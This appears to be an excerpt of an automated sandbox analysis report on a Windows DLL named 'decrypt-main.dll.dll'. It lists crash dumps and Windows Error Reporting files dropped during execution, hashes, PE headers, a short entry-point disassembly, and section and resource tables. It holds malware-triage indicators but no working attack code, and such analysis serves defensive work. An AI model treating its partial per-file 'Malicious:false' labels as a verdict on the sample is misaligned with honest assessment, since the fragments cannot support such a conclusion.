                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.8.<./.P.i.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4903
                        Entropy (8bit):4.468981602436986
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zs0Jg771I9VaWpW8VYqYm8M4JC2CU/F2Koyq8vhUZuVptSTSBd:uIjfyI7yb7VaJEKoWvVpoOBd
                        MD5:FC6A380DAE8EB28FBB4711A39CEEA83B
                        SHA1:57A61096F84D945877555A0BEF42D0FC6B30A360
                        SHA-256:5BF223640218A3C2D8318E454A85976B59DF6C75044978D6DB34C17152EE9455
                        SHA-512:CB15A16F8A65505B451D3D5D896D37E660741BCAD7A1307EB09E06EE4D1D759943D6B0CC109C7384D7C1473AFAFA3C4C03FBFA8A89B0C4064254E5A43A05BB4C
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 15:50:59 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):187746
                        Entropy (8bit):1.5244364413253133
                        Encrypted:false
                        SSDEEP:384:C0w7BwLbRO+GdgQKbd38BC7UMPUCCCCJAfXePfiL6/kPcRy/O4eFLAF:bw7BwLc+Gdhs7UMPUCCCCJiLJkEGF
                        MD5:1B08ABC5DFCED9B1BD7FC659256ACA08
                        SHA1:AAD8572C3C95659E8EB6F6A1E8323956FB0A259E
                        SHA-256:05D3D46A9CEE48B42ED7652D2BDDAD2C5788F05231F1BB6D46DA71511FC96074
                        SHA-512:C709CE12A1132441259983897926510D8CF828CB8717705E41795CB96085B117F3C9FE11CFD0484B5669AFCAA363CFB719EABDB0071F8D708AF38704F05C9BBE
                        Malicious:false
                        Preview:MDMP..a..... .......c..e.........................................i..........T.......8...........T............N..............%...........'..............................................................................eJ......T(......Lw......................T.......\..._..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):9010
                        Entropy (8bit):3.7074128279527345
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJgk36Yh/llgmf3R4l00MprH89bi9OfFRWm:R6lXJr36Yp3gmf3R4lLi0fFJ
                        MD5:85773FCCCC2EA05FC98BD5D8FED300DD
                        SHA1:9608BFD95650FF7FE630BD7D7CC0AF7F38CAA0A0
                        SHA-256:A4549B81B2F90A362CF60820D77B6B2B4F88BA9B72CC1575B8685F00DFD0AC70
                        SHA-512:D0789139A855BB8B22B8967770A2E8005BBCF3A83429E51D3BF34872ABCFE14D4428F65373DBCE9B9673CEF065AFEAD93DB46B3F1FBFD5039693B747506B8B21
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.6.<./.P.i.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4788
                        Entropy (8bit):4.500167258042371
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zs0Jg771I9VaWpW8VYSNYm8M4JC2CU6FEjyq85mcX3WptSTSYd:uIjfyI7yb7V9MJjj83WpoOYd
                        MD5:08EC22F5886DBB92A702B34AA96F47AC
                        SHA1:D59F809B804BFAAEC3574E1608A7A5CE676C749B
                        SHA-256:CB2047E6332B95E2A872F1B662ACD3C275B34F3EC3A78E7245F2CBF16516DF5C
                        SHA-512:D4EA392A16982E81197E00B2396955876A4E2F42F2EB7E6003495C4C6DE401D958D80CAE4FDE789EF35111FB167B1DB31167808B4E591BA911B08BC96B3A552F
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 15:50:56 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):71048
                        Entropy (8bit):1.5346934795378822
                        Encrypted:false
                        SSDEEP:192:RS9d9AvCOML1O5oFn3OVncTwam6m3tSCG/ulL:e9Avdek63kcCB3tSCj9
                        MD5:471A91B049ED66986EE8EF0ED2DCAD73
                        SHA1:00505AC14E0EBE71D6A4FEBB6B7F1964F4B47175
                        SHA-256:B3448ABD4A56978E566A8F6AFD202E65410727D99D1845A35C11E892776F7586
                        SHA-512:3D2EACD3994A47FEE344AA41CB6486B24D62AB09A12F5A90351998CCF8E976DAD767707AC2E3B1B3CAD15F4E833B3642EE5B1553BE868823658405D65862ADE0
                        Malicious:false
                        Preview:MDMP..a..... .......`..e....................................$...~3..........T.......8...........T........... ...h...........P...........<...............................................................................eJ..............Lw......................T.......l..._..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):9080
                        Entropy (8bit):3.696122822329319
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJmi1P86YZzJigmf2INmFhpr789bVICfRyjnm:R6lXJT1P86YN8gmf2IuwVtfB
                        MD5:13ED1D898573DE951C71618DE7CFC74C
                        SHA1:5BB5BF7D88FDBB1363C4F47888B2583F23C3D167
                        SHA-256:56924DC6ADC8EE2E58F35CC45F835B95C753702E61B22FE48A72F236B2FB775D
                        SHA-512:F46701CF0092B3917BCBF58174090DBF678F2EA7F0AC626A5109784C06EB60F96D4C0A94558229A271E055BDE452B2B712689480AB0B8FE9280DF2DAE1E83311
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.2.<./.P.i.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4903
                        Entropy (8bit):4.46545581557317
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zs0Jg771I9VaWpW8VYiYm8M4JC2CU/FHRHyq8vhULptSTSDd:uIjfyI7yb7V+JzHWEpoODd
                        MD5:DE0D98CD0207448B7C8464C8EF00CC83
                        SHA1:27A694136DA0AA3F6400CBA75B8DE33DBB1BF9F5
                        SHA-256:EC0D557461F27D8E768C8A1F663DA18069E0DA769ACC5E28455C31A8132B579E
                        SHA-512:ED4E459F81526553F65491AABDFBEF2B6937CC1ABA935626FBEF6746362F848F03588D1824F7C286B4E978235E5BCF9EE4F646AE5E96D9B57E8D0594190CCD02
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.466364938502888
                        Encrypted:false
                        SSDEEP:6144:vIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:AXD94zWlLZMM6YFHa+9
                        MD5:79A0971362595F4A62F3F046C136B02E
                        SHA1:D65368D6CB282F420148AAA011B6982B175DEE56
                        SHA-256:363646F47F9352329F420ED8A8C048FF657899493D3F8E759A2FE903BE442D03
                        SHA-512:029FA914A44EE839085BCBBF9B689F3DE9A3CCCE06D0FAB8BE05767E5420E891788AC0E2E7C00E72317FBE6F46E2E63751562F6B65B08FD4E52AD5F6F51EDE4B
                        Malicious:false
                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*1.<^u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Entropy (8bit):5.979646090579889
                        TrID:
                        • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                        • Win64 Executable (generic) (12005/4) 10.17%
                        • Generic Win/DOS Executable (2004/3) 1.70%
                        • DOS Executable Generic (2002/1) 1.70%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                        File name:decrypt-main.dll.dll
                        File size:5'330'944 bytes
                        MD5:1715ba4aa4ff4c70e66943076f3236ac
                        SHA1:f57bfbe116f915e5525c5eff36b5eb5969282171
                        SHA256:faebf87c3ff1345bbd5910fe4633b2b49dc83fe62b400ecaa102594d5edb39f0
                        SHA512:ad06e05a1cdc6a92af67c8b96ff708bb92e25e5b021478c7e7f1df13eca9223d107f1de9467d1d24efcf831602ab816d491e68d37b98883b8410642583f7ef48
                        SSDEEP:49152:5DEhDXc+rWZtaJ8CifXdpbnaSl+lcOFo66bJeaE3g6XGTkN6h:5WUaJri/zfTsRq
                        TLSH:233639BB76A482A9C16EC13ED0E38F00D933B1B61733C6E7629143652E469D46F3F661
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                        Icon Hash:7ae282899bbab082
                        Entrypoint:0x8167d0
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                        DLL Characteristics:
                        Time Stamp:0x65E92BED [Thu Mar 7 02:52:29 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:2
                        File Version Major:5
                        File Version Minor:2
                        Subsystem Version Major:5
                        Subsystem Version Minor:2
                        Import Hash:e015ba11e1ddaa5380318c50a8051d1f
                        Instruction
                        push ebp
                        dec eax
                        sub esp, 00000180h
                        dec eax
                        mov ebp, esp
                        dec eax
                        mov dword ptr [ebp+30h], ecx
                        mov dword ptr [ebp+3Ch], edx
                        dec esp
                        mov dword ptr [ebp+40h], eax
                        nop
                        dec eax
                        lea ecx, dword ptr [ebp+48h]
                        call 00007F22F0B434C5h
                        cmp eax, 01h
                        setle cl
                        dec eax
                        movzx ecx, cl
                        mov dword ptr [ebp+0000017Ch], ecx
                        test eax, eax
                        jne 00007F22F0F4A502h
                        dec eax
                        lea ecx, dword ptr [ebp+48h]
                        dec eax
                        lea edx, dword ptr [00000051h]
                        dec esp
                        mov eax, dword ptr [ebp+30h]
                        inc esp
                        mov ecx, dword ptr [ebp+3Ch]
                        dec eax
                        mov eax, dword ptr [ebp+40h]
                        dec eax
                        mov dword ptr [esp+20h], eax
                        call 00007F22F0B4DAE0h
                        jmp 00007F22F0F4A4DAh
                        nop
                        nop
                        call 00007F22F0B42CE7h
                        nop
                        call 00007F22F0B435E1h
                        mov eax, dword ptr [ebp+0000017Ch]
                        dec eax
                        lea esp, dword ptr [ebp+00000180h]
                        pop ebp
                        ret
                        dec eax
                        lea eax, dword ptr [eax+00h]
                        dec eax
                        lea eax, dword ptr [00000000h+eax]
                        dec eax
                        sub esp, 28h
                        call 00007F22F0B42BECh
                        dec eax
                        add esp, 28h
                        ret
                        add byte ptr [eax], al
                        enter 0000h, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        nop
                        push 00000081h
                        add byte ptr [eax], al
                        jnc 00007F22F0F4A4ECh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [ebp-7Fh], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ebx+00h], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        test al, 48h
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax-54h], ah
                        inc ecx
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x49b0000xcc.edata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4940000x5134.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5130000x13400.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4d40000x3e160.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x49d0000x36e34.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x4955000x1308.idata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x49a0000xf2a.didata
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x423f700x424000b7f27458062548a6937770656e7e3fc1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .data0x4250000x626200x628009a2bac6930b172b6685b28ba442630cdFalse0.26204344463832485data4.902591015474462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .bss0x4880000xbf9c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata0x4940000x51340x5200703a5e532c59ee1f8016d0490c2480cdFalse0.2421875data4.251729395494642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .didata0x49a0000xf2a0x1000c373d4d2586c9b286933e221aadd59bcFalse0.253662109375data3.24473098416006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .edata0x49b0000xcc0x20009500bfbbf513ed005e4bb6dff2efa39False0.345703125data2.4492227742982298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rdata0x49c0000x440x200c8956fe83c39059a06fbaa227b86bb22False0.15625data1.1709274092963795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x49d0000x36e340x37000099680a7bdd7617d15c3ab408e1cbd03False0.46367631392045455data6.45364680864244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        .pdata0x4d40000x3e1600x3e200fb0adaccc8febc7d9f0cb5f536122620False0.4902186556841046data6.396233810440188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x5130000x134000x13400bb501744d3457770d2c2e99247451795False0.24665178571428573data5.0560496894268265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_CURSOR0x51432c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                        RT_CURSOR0x5144600x134dataEnglishUnited States0.4642857142857143
                        RT_CURSOR0x5145940x134dataEnglishUnited States0.4805194805194805
                        RT_CURSOR0x5146c80x134dataEnglishUnited States0.38311688311688313
                        RT_CURSOR0x5147fc0x134dataEnglishUnited States0.36038961038961037
                        RT_CURSOR0x5149300x134dataEnglishUnited States0.4090909090909091
                        RT_CURSOR0x514a640x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                        RT_BITMAP0x514b980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                        RT_BITMAP0x514d680x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                        RT_BITMAP0x514f4c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                        RT_BITMAP0x51511c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                        RT_BITMAP0x5152ec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                        RT_BITMAP0x5154bc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                        RT_BITMAP0x51568c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                        RT_BITMAP0x51585c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                        RT_BITMAP0x515a2c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                        RT_BITMAP0x515bfc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                        RT_BITMAP0x515dcc0x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.391304347826087
                        RT_BITMAP0x515e280x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.532608695652174
                        RT_BITMAP0x515e840x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.4782608695652174
                        RT_BITMAP0x515ee00x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.5543478260869565
                        RT_BITMAP0x515f3c0x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.4673913043478261
                        RT_BITMAP0x515f980x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.328042328042328
                        RT_BITMAP0x5164080x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.3289241622574956
                        RT_BITMAP0x5168780x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.40476190476190477
                        RT_BITMAP0x516ce80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.09435626102292768
                        RT_BITMAP0x5171580x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.23721340388007053
                        RT_BITMAP0x5175c80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.29188712522045857
                        RT_BITMAP0x517a380x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.1675485008818342
                        RT_BITMAP0x517ea80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2892416225749559
                        RT_BITMAP0x5183180x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2751322751322751
                        RT_BITMAP0x5187880x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.30776014109347444
                        RT_BITMAP0x518bf80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2777777777777778
                        RT_BITMAP0x5190680x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.41887125220458554
                        RT_STRING0x5194d80x624data0.3333333333333333
                        RT_STRING0x519afc0xb3cdata0.2437413073713491
                        RT_STRING0x51a6380x22cdata0.4172661870503597
                        RT_STRING0x51a8640x33cdata0.43719806763285024
                        RT_STRING0x51aba00x488data0.32413793103448274
                        RT_STRING0x51b0280x508data0.2694099378881988
                        RT_STRING0x51b5300x494data0.40017064846416384
                        RT_STRING0x51b9c40x3dcdata0.3248987854251012
                        RT_STRING0x51bda00x358data0.4485981308411215
                        RT_STRING0x51c0f80x404StarOffice Gallery theme l, 1677731072 objects, 1st l0.41245136186770426
                        RT_STRING0x51c4fc0xa0data0.7125
                        RT_STRING0x51c59c0xe4data0.6359649122807017
                        RT_STRING0x51c6800x2c4data0.4138418079096045
                        RT_STRING0x51c9440x254data0.4865771812080537
                        RT_STRING0x51cb980x3d0data0.3698770491803279
                        RT_STRING0x51cf680x3b8data0.3760504201680672
                        RT_STRING0x51d3200x47cdata0.3423344947735192
                        RT_STRING0x51d79c0x38cdata0.3634361233480176
                        RT_STRING0x51db280x2c4data0.3559322033898305
                        RT_STRING0x51ddec0x3f8data0.39173228346456695
                        RT_STRING0x51e1e40x524data0.3844984802431611
                        RT_STRING0x51e7080x4acdata0.31605351170568563
                        RT_STRING0x51ebb40x3b0data0.3707627118644068
                        RT_STRING0x51ef640x39cdata0.32142857142857145
                        RT_STRING0x51f3000x40cdata0.3735521235521235
                        RT_STRING0x51f70c0xf4data0.5491803278688525
                        RT_STRING0x51f8000xc4data0.6275510204081632
                        RT_STRING0x51f8c40x268data0.48863636363636365
                        RT_STRING0x51fb2c0x434data0.3308550185873606
                        RT_STRING0x51ff600x360data0.38425925925925924
                        RT_STRING0x5202c00x2ecdata0.37566844919786097
                        RT_STRING0x5205ac0x31cdata0.34296482412060303
                        RT_RCDATA0x5208c80x10data1.5
                        RT_RCDATA0x5208d80x7c8data0.5281124497991968
                        RT_RCDATA0x5210a00x2dataEnglishUnited States5.0
                        RT_RCDATA0x5210a40xc45Delphi compiled form 'TFJustificativa'0.3081821076090417
